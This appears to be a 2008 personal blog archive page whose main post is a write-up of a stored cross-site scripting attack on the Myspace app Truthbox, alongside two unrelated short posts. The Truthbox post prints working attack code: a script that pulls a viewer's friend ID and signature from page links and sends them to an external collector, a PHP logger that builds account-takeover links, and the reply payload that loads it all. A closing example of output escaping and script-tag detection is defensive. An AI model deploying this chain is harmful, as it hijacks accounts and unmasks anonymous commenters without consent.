Joey Adams Dot Net

Southern Fried Programming


Archive for October, 2008


What REALLY happens when you view a webpage

This post is something I thought of while listening to people talk and gripe about how long it takes to view websites and to surf the internet. The majority of people do not understand the inner workings of computer systems at very low levels (even I have a threshold of knowledge I have to stop at), but I think it would be an interesting read for someone who wants to know exactly what happens when they hit ‘GO’ in their favorite browser (hopefully Firefox ;) ).

INTRO:

To start things off, let's talk about what the internet consists of. Most everyone knows what a browser is, has heard of “servers” before, and has seen a modem or router. These objects provide the basis for connectivity; after all, the internet is nothing more than a great big network of computers.

Hacking Myspace’s Truthbox

I developed exploit code for Truthbox months ago, and am now releasing a writeup.

Myspace applications are stand-alone web applications hosted on arbitrary servers that use Myspace’s API to exchange user information with their own programming logic. I have not explored the details of authorization and authentication for the API, but I imagine it is similar to PayPal’s API: a series of requests and responses using transaction IDs and pre-shared authentication keys, hopefully also using referrer information to determine whether the packets were sent from a legitimate source. Even with these protections, such mechanisms are always flawed.

Back to the subject: I first discovered that you can enter script in almost any form into Truthbox replies. You cannot do this with the initial comment itself, but in replies you can enter markup and script without it being filtered; in other words, XSS (cross-site scripting).

The next part was finding something on the client side that ties the page to your Myspace identity. As it turns out (and this is part of an even bigger hole), your friend ID is stored in links all over the place inside a GET variable called ‘fb_sig_user’. More on why later.

So we create a script that parses the page and picks this friend ID out of the links on the page. Not all links on the page contain this variable, so the script has to work a little harder. After we extract the friend ID, we can store it and view it later, plugging it into a Myspace URL, which gives you the identity of whoever left you a comment. One problem: replies are limited in characters, but all you have to do is store your script somewhere on the web and, in your reply, call the external script.

Now why does it store your friend ID anyway? For identification. Since you are not operating on Myspace’s servers but in an iframe pointing to an arbitrary script, it is exactly like visiting an entirely different website. The seamless communication happens on the backend between Myspace and this app server, so by supplying your friend ID in the URL of web requests, you are telling ‘TruthBox’ who you are. So what if we change our friend ID to someone else’s?

Well, as I found out by plugging in variable by variable, Truthbox does check to make sure you are ‘you’. There is a value, a signature, associated with your Truthbox account. If you have someone's friend ID and their signature, you simply plug these into the URL and you can take control of their Truthbox account. Luckily, the signature is also stored in client-side URL values as ‘fb_sig’, so we adjust our script to pull this value out along with the friend ID and we should be good to go.

Here is, in layman’s terms, how it works.

Someone leaves you a nasty (or exciting :) ) comment. You reply to their comment with an external script. In my script, I added a way to include a comment to separate different Truthbox comments from each other. Whenever they view your reply, the script runs, extracts their friend ID and Truthbox signature, and stores them to view later, along with the comment from my script.

You view the results and can click a link to view their Myspace profile. Another link, when clicked, lets you take control and look through their Truthbox profile, seeing everyone they have commented on and who has commented on them.

This was simply fun messing with the unknown, and nothing more. With this research I more than accomplished what I wanted, and beyond the two days I spent messing with it, I have not looked at the source of Truthbox pages since.

Below is some of my source code of the scripts I used.

The external script (a.js):

// a.js: loaded into the viewer's page by the <script src> in the reply
function strpos(haystack, needle, offset) {
    // PHP-style strpos: index of needle, or false if it is absent
    var i = (haystack + '').indexOf(needle, offset);
    return i === -1 ? false : i;
}
function gets(str) {
    // Everything after 'fb_sig%3D' (URL-encoded 'fb_sig=') is the signature
    var f = strpos(str, 'fb_sig%3D') + 9;
    return str.substr(f);
}
function getf(str) {
    // 'fb_sig_user%3D' is 14 characters; the friend ID runs up to the next '%26' ('&')
    var f = strpos(str, 'fb_sig_user') + 14;
    var s = strpos(str, '%26', f);
    var l = s - f;
    return str.substr(f, l);
}
function a(comment) {
    // Walk document.links until one carries fb_sig_user, then send the
    // friend ID, signature and comment tag to the collector (cook.php)
    var i = 0;
    var f = 0;
    while (f != 1) {
        if (document.links[i].href.search('fb_sig_user') > 0) {
            window.location = "http://xxxx/cook.php?c=" + comment + "&u=" + getf(document.links[i].href) + "&s=" + gets(document.links[i].href);
            f = 1;
        } else {
            i++;
        }
    }
}

cook.php

<?php
// cook.php: collector; appends one entry per viewer to results.html
@$u = $_GET['u'];   // friend ID
@$s = $_GET['s'];   // Truthbox signature

$dir = 'results';

$h = fopen("./{$dir}/results.html", 'a+');
$text = '';
if (isset($_GET['c'])) {
    $text .= "Comment= {$_GET['c']} - ";
}
if (isset($_GET['s'])) {
    $text .= "<a href='http://opensocial.rockyou.com/google_apps/truthbox/truthbox/html/index.php?target=home&fb_sig_user={$u}&fb_sig_network=myspace&fb_sig={$s}'>See Their Truths</a> -";
}
$text .= "Profile: <a href='http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid={$u}'>View Profile</a><hr/>";
fwrite($h, $text);
fclose($h);
?>

The reply used to trigger the attack.

<script type='text/javascript' src='http://xxxx/a.js'></script>
<script>a('Comment Here');</script>
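The whole chain starts with the reply body above being placed into the page unencoded. The following is an added example, not the blog's or Truthbox's code: a vulnerable reply renderer beside an entity-encoding one, fed the trigger reply as constructed input, plus a triage check for replies already in the store. The function names and markup are assumptions.

```javascript
// Added example, not Truthbox's code: the reply rendering paths that make or
// break this bug. TRIGGER_REPLY is the reply payload shown above, as constructed input.
const TRIGGER_REPLY =
  "<script type='text/javascript' src='http://xxxx/a.js'></script>" +
  "<script>a('Comment Here');</script>";

// Vulnerable path: the stored reply body is concatenated into the page as
// markup, so the viewer's browser fetches a.js and runs a() inside the app.
function renderReplyUnsafe(author, body) {
  return `<div class="reply"><b>${author}</b>: ${body}</div>`;
}

// Hardened path: every user-supplied field is entity-encoded before it is
// placed in element content, so the same payload is displayed as text.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderReplySafe(author, body) {
  return `<div class="reply"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Triage heuristic for replies already in the store: flags bodies that carry a
// script element. Useful for finding existing payloads; not a substitute for encoding.
function looksLikeScriptInjection(body) {
  return /<\s*script\b/i.test(body);
}
```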

Lack of.. Posting

I have not posted in a good while because I have been too busy with things. With the economic meltdown, my day job has now doubled. I work at a local FOX affiliate, but I also contract IT work for them as well. Due to the current hiring freeze I can’t be promoted (not sure I would be in the first place), and to top all that off I also work with Heritage Web Solutions as an outsourced dev.

Between it all I make some good money but do not get a lot of free time, and the time I get is consumed with my son and my many hobbies.

What I want to accomplish before the new year is the Zend Framework cert, and then complete the MySQL exam in the first quarter of next year. That should satisfy me for now.

There have been a great deal of happenings in the security world, the newest being the ever-elusive clickjacking. I’ve been keeping up with it by constantly reading RSnake’s blog over at http://ha.ckers.org. If you have not heard of it, then you MUST visit his blog to read more; I won’t disrespect the subject by regurgitating what he said, you must read it for yourself.